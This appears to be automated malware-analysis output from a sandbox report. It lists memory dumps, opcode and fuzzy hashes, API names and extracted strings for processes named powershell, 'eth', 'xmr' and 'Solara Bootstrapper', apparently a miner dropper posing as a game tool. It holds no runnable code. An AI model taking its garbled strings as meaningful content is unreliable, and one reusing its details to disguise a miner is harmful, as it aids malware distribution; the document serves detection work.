                          • Opcode ID: 78f9fe79a17b0fe1695a73749500d7ff1e609210953daf4ba165c5f30b8916f9
                          • Instruction ID: 0571fd8a675051058dfbec7e9a28a30eb79ecc6aceb65444a4c5bc0f98cdd50f
                          • Opcode Fuzzy Hash: 78f9fe79a17b0fe1695a73749500d7ff1e609210953daf4ba165c5f30b8916f9
                          • Instruction Fuzzy Hash: A9D05B34E04309DFC708EFA4E45686EBBB5E744300F004159DE5993380E7305855DFC1
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 54b59fdf977fb2aa92e695b13d3e3165469494635f7955a8971c43fe2858fc47
                          • Instruction ID: a7c0fd09e612b97ffcfd9887710e296d9cb9941b63ca7355bc7abc547d2461bb
                          • Opcode Fuzzy Hash: 54b59fdf977fb2aa92e695b13d3e3165469494635f7955a8971c43fe2858fc47
                          • Instruction Fuzzy Hash: 51D067319051099BCB08AFA4E86B4BEBB38FA14301F4151ADDA67522D1EB312A5ACAC1
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad49ffa86d0665d91ec589e7135d841b6541c82dba046f111bd3539ffd5fae2e
                          • Instruction ID: 2a0bd27bc326afc48596dbaf90524fcddf62fbe8eba88cd7715ef4256a4c15a5
                          • Opcode Fuzzy Hash: ad49ffa86d0665d91ec589e7135d841b6541c82dba046f111bd3539ffd5fae2e
                          • Instruction Fuzzy Hash: 20D09E3418D3C55FC71B8B79949845E7FA06D1311030904FED485CF5A7C666C449CB01
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9fc85f1f6e42e37d807c286d5afdda924b126c760b31c4ae54308973030550fc
                          • Instruction ID: aa898db78e5e57b4fb3380b93b5375d75c7ddf1f884dd711f32b2b9721068f43
                          • Opcode Fuzzy Hash: 9fc85f1f6e42e37d807c286d5afdda924b126c760b31c4ae54308973030550fc
                          • Instruction Fuzzy Hash: 73C04C255867E56EE34705324C402852FF09C5341034E02FE41C5CF5E7D60DC94F8B91
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d97d4f755605a25288d2bd7b5e0b887378b59a55122d6ca7c13722c724ffe5a3
                          • Instruction ID: 5e9de9d1a4c6b892063f01486108f1a807c6a0f2d6ff812c959fcd4b46f18655
                          • Opcode Fuzzy Hash: d97d4f755605a25288d2bd7b5e0b887378b59a55122d6ca7c13722c724ffe5a3
                          • Instruction Fuzzy Hash: A3B092340487088FC2086F76A408829732DBA4120578408A8E40E4B6A68E37E841CA44
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2190328303.0000000008BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: Xm^
                          • API String ID: 0-3273323625
                          • Opcode ID: c543510d2bc7aaa31a58c03fb1da1fc6ccbbafe397b866d5d196e5373fc3ddae
                          • Instruction ID: 2c641f18a9ef8ddf143a9825c70c60a47ed678d8391e8143c593543088bedf2d
                          • Opcode Fuzzy Hash: c543510d2bc7aaa31a58c03fb1da1fc6ccbbafe397b866d5d196e5373fc3ddae
                          • Instruction Fuzzy Hash: B5E12D707002059FDB14DF39C944BAABBF5EF48305F10897DD50ADB2A2EB75E94A8B90
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $cBk$4'jq$4'jq$4'jq$4'jq$84Ml$84Ml$tPjq$tPjq$JPl$JPl$JPl$JPl$JPl$rOl$rOl
                          • API String ID: 0-314082401
                          • Opcode ID: 22e994a91fdfe44d27a4ad8fcb763a908d3c299fe306ea7dce861a31c6a00037
                          • Instruction ID: df8ff113b70630947b4fd7f832c1453491df85cc8d78874df4360a7d7bb08d02
                          • Opcode Fuzzy Hash: 22e994a91fdfe44d27a4ad8fcb763a908d3c299fe306ea7dce861a31c6a00037
                          • Instruction Fuzzy Hash: 44D147B2B042498FCB51AB68D4107AABBB6EFC6211F14846FC965CB295DB31CC46C7A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$El$El
                          • API String ID: 0-1045847289
                          • Opcode ID: 3796879a0bc6fd698919e2fa3141182d2fd3718a1f04c1e88a96734116ae6e07
                          • Instruction ID: 4c16b7e2e2fe5f3d75bd448632ec8296b7d472c0852b746b31fc7fc74aed98f8
                          • Opcode Fuzzy Hash: 3796879a0bc6fd698919e2fa3141182d2fd3718a1f04c1e88a96734116ae6e07
                          • Instruction Fuzzy Hash: 2AA157B17042159FCF50AB69D810B7EBBB6EFC6A20F14846AD865CB391DA32CC45C361
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$$jq$$jq$$jq$El$El
                          • API String ID: 0-2108968551
                          • Opcode ID: fbb3196292d97bbbc84a17249e1efdf9eb5e57fc35b36ed3b7f6da9a6c8d09ba
                          • Instruction ID: 676993f75a72ffdd8c5b2e45bdabef1609a1fe6c7e49f73d2627c0a21a1b556d
                          • Opcode Fuzzy Hash: fbb3196292d97bbbc84a17249e1efdf9eb5e57fc35b36ed3b7f6da9a6c8d09ba
                          • Instruction Fuzzy Hash: 12515CF17043069FCF64AB29881067EFBB6AFC2A61F14807BD465CB251DA35C845CBA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: TcBk$lcBk$JPl$JPl$JPl$JPl
                          • API String ID: 0-3379438071
                          • Opcode ID: 437ae433bcfdca986ed86c8fce5f8113973241216775faca8dd0f04d7ce5d28b
                          • Instruction ID: 125820219018c8858ecb05628ba52d72bde8adcd9cbb37ef0a46df6b8139039c
                          • Opcode Fuzzy Hash: 437ae433bcfdca986ed86c8fce5f8113973241216775faca8dd0f04d7ce5d28b
                          • Instruction Fuzzy Hash: 1D3102F16083919FC3565B284C01A727FB6BFE3710B198497D5A0DF6D2DA309885C3A2
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: tMOl$`kq$`kq$`kq$`kq
                          • API String ID: 0-3148330094
                          • Opcode ID: c7560464aeb9142e9d7f8aed8a507541d994aa42d0f49befcbe5cca96abf9c25
                          • Instruction ID: 4ac6c2f98b54bc2092094649ab932f128cb3c58631b8e949f00ee232cb419085
                          • Opcode Fuzzy Hash: c7560464aeb9142e9d7f8aed8a507541d994aa42d0f49befcbe5cca96abf9c25
                          • Instruction Fuzzy Hash: DBB19074E002099FDB54DFA9D980A9DFBF6FF88304F10866AD419AB355EB34A905CF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: tMOl$`kq$`kq$`kq$`kq
                          • API String ID: 0-3148330094
                          • Opcode ID: 1127ba88d191d2841b9fdd09fa248f47264fc4cf284d74d74518646ebfd9fbad
                          • Instruction ID: 8ea9a9271bc0db6b2567d2506923c65ecd26cab097554e1306d32373c7f951b8
                          • Opcode Fuzzy Hash: 1127ba88d191d2841b9fdd09fa248f47264fc4cf284d74d74518646ebfd9fbad
                          • Instruction Fuzzy Hash: 42B19174E002099FDB54DFA9D980A9DFBF6FF88300F108669D519AB354EB34A905CF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$84Ml$tPjq$JPl$JPl
                          • API String ID: 0-3586433588
                          • Opcode ID: 45a8fb980ece9f3ff0f70f136e20152a0062f19289d09d5adcf277be785bc696
                          • Instruction ID: 143ae152743f55688e8815160f57db74b75a342e0ef05bc707cdbaccd0866506
                          • Opcode Fuzzy Hash: 45a8fb980ece9f3ff0f70f136e20152a0062f19289d09d5adcf277be785bc696
                          • Instruction Fuzzy Hash: E3218FB2A0020ADBDB61AF44C441B36F7B2FBC1711F19806BDA359B191C732DC42C6A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq$$jq$$jq$$jq
                          • API String ID: 0-2428501249
                          • Opcode ID: f876f9b47ecd5f6483f5ef26b04c2014755638f7c60556789ac90b803a8e904b
                          • Instruction ID: e04cb1cc4ebc0575daf837370a901891fa25b90c145d364c188863c7c9978aba
                          • Opcode Fuzzy Hash: f876f9b47ecd5f6483f5ef26b04c2014755638f7c60556789ac90b803a8e904b
                          • Instruction Fuzzy Hash: 90216BB1B103069FDBA4BA6A8800B37BBEB9FC1712F24843BED15DB281DD75C8118761
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: m^$m^$m^$m^
                          • API String ID: 0-3502344340
                          • Opcode ID: b019c1285bcee239446a56293dc005114107dfb422608bfe22c94ac1f3547b99
                          • Instruction ID: bb41bf542bbe21a05443a6c8992a7c175d27adf2a9cc1369b7c334646a2f9c1e
                          • Opcode Fuzzy Hash: b019c1285bcee239446a56293dc005114107dfb422608bfe22c94ac1f3547b99
                          • Instruction Fuzzy Hash: B9110A12A0E3C10FC3075B294AA81D03F71AF63294B5E41EBC5C88F1A7E929A90FC357
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq$$jq$JPl$JPl
                          • API String ID: 0-131527678
                          • Opcode ID: 484543f326070999490905ac1675cb4654fe4289cc4bbc81e2abcf737994dbde
                          • Instruction ID: 1f8a045cda3e64c8d8c9dd25897ada5c0d0c453cae8b7f8e3bf273796e4ffcb5
                          • Opcode Fuzzy Hash: 484543f326070999490905ac1675cb4654fe4289cc4bbc81e2abcf737994dbde
                          • Instruction Fuzzy Hash: 1701D4B26093814FC32316284D106637FBBAFD761072981D7CA94DF2AAC6358C09C3A2
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$$jq$$jq
                          • API String ID: 0-1496060811
                          • Opcode ID: cd4c80f9b74803d2c97684de21d5b12d07fcdc54ac6320a5a3eaea931db79fd8
                          • Instruction ID: 5b32b17b3821b53446f587602cb3755eaa9984cf7890be5503419fa243aab15f
                          • Opcode Fuzzy Hash: cd4c80f9b74803d2c97684de21d5b12d07fcdc54ac6320a5a3eaea931db79fd8
                          • Instruction Fuzzy Hash: 6101846134D3965FC32B262858205676F769FC350072940EBC8A0DF297CE158D0AC3A7
                          Memory Dump Source
                          • Source File: 00000004.00000002.2208149163.00007FF6E2781000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6E2780000, based on PE: true
• Associated: 00000004.00000002.2207986054.00007FF6E2780000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2208298428.00007FF6E278B000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2208411918.00007FF6E278E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2208567914.00007FF6E278F000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2209510531.00007FF6E2C83000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2209572681.00007FF6E2CBA000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ff6e2780000_eth.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                          • Instruction ID: 8afb947d37454b8b2ab3b40e63a62774a69c163e2a8977a6e5dc002fd452a6b4
                          • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                          • Instruction Fuzzy Hash: FBB01232D0435D84EB092F01D84137836617B0AB44F501030C40C83362CFFF50604B16
                          Memory Dump Source
                          • Source File: 00000007.00000002.2205699522.00007FF68E981000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF68E980000, based on PE: true
• Associated: 00000007.00000002.2205573967.00007FF68E980000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2205808717.00007FF68E98B000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2205938484.00007FF68E98E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2205994909.00007FF68E98F000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2211092211.00007FF68EE83000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2212296394.00007FF68EEBA000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_7ff68e980000_xmr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:

                          Execution Graph

                          Execution Coverage:80.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:28
                          Total number of Limit Nodes:1

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2096791988.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2096737642.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2098346362.0000000000402000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2098346362.0000000000E02000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2127722449.0000000000E78000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_Solara Bootstrapper.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                          • String ID:
                          • API String ID: 3649950142-0

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2096791988.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2096737642.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2098346362.0000000000402000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2098346362.0000000000E02000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2127722449.0000000000E78000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_Solara Bootstrapper.jbxd
                          Similarity
                          • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                          • String ID: ! @$%s\%s$& @$1 @$`!@$e!@$p!@$q1$v1
                          • API String ID: 3236948872-410439292

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          APIs
                          Strings
                          • :j60n8x(2vu00d[5(k=x&a--.[.)$<.8, xrefs: 0040106E
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2096791988.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2096737642.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2098346362.0000000000402000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2098346362.0000000000E02000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2127722449.0000000000E78000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_Solara Bootstrapper.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID: :j60n8x(2vu00d[5(k=x&a--.[.)$<.8
                          • API String ID: 2803490479-829780682

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2096791988.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2096737642.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2098346362.0000000000402000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2098346362.0000000000E02000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 0000000A.00000002.2127722449.0000000000E78000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_Solara Bootstrapper.jbxd
                          Similarity
                          • API ID: memset$ExecuteShellstrcmp
                          • String ID: D`:vD`:v$D`:vD`:v
                          • API String ID: 1389483452-3916433284

                          Execution Graph

                          Execution Coverage:5.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$JPl$JPl$JPl$JPl$JPl$JPl$rOl$rOl
                          • API String ID: 0-3034988559

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$4'jq$4'jq
                          • API String ID: 0-4000621977

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2243812301.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_8f10000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2243812301.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_8f10000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq
                          • API String ID: 0-2756854522

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (&jq
                          • API String ID: 0-3222446104

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,(Cl
                          • API String ID: 0-1655630199

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2237372818.0000000007DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7da0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc7bb7f23ad00c47049f67a8d0590a9d8dc57e225fe8b5e71399eb26ed45d332
                          • Instruction ID: 34af5dfdd3dc8d5e4171b786e25d8863aee80dc44ff77246b83a6f4aec6968f1
                          • Opcode Fuzzy Hash: bc7bb7f23ad00c47049f67a8d0590a9d8dc57e225fe8b5e71399eb26ed45d332
                          • Instruction Fuzzy Hash: F9318B353006019FD709EB79E944AAEB7AAEFC4315F108639D60ACB365DB74E805CBA1
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 761db11d22c13dab03412d6f0ae7ee782d2a7e55cdc08b66ba2d0e026f84f280
                          • Instruction ID: 82620633c587586072cd9d7f8d04ac389efd4336812887b1c76405da67b7f5c1
                          • Opcode Fuzzy Hash: 761db11d22c13dab03412d6f0ae7ee782d2a7e55cdc08b66ba2d0e026f84f280
                          • Instruction Fuzzy Hash: 1D316D70E012098FDB14EFAAD5947BEBBF2EF88314F14902DE405EB355EA75AC018B54
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f26ed6596beb155fa343a70acd87e1ec5debc1277be6ebee6b3afc48563e98d8
                          • Instruction ID: e604c363738c3ee693a17a0c5f3dd48fcd2e36b04d1092a2f027317b9889ce93
                          • Opcode Fuzzy Hash: f26ed6596beb155fa343a70acd87e1ec5debc1277be6ebee6b3afc48563e98d8
                          • Instruction Fuzzy Hash: BF315E70E012099FDB04DFAAD5947BEBBF6EF88300F109029E405EB354EA75AC018B54
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 076511b9f14efaf97c95bfa57dc069e728f9767b5199c3b3f83720d6b460d37f
                          • Instruction ID: cc9bb1561489e94663f6d1b88ba1f51e3e3b9279be2cdabbd7e1e7d3ce7a0034
                          • Opcode Fuzzy Hash: 076511b9f14efaf97c95bfa57dc069e728f9767b5199c3b3f83720d6b460d37f
                          • Instruction Fuzzy Hash: 4F316EB8A002059FDB04DF68E458ABE7BB6FFC4300F1184BDC111AF3A5CA799D018B51
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47437bcc23a30ed3514d229b19c5ebe16cb51d1157fef83049397d5ea63f3266
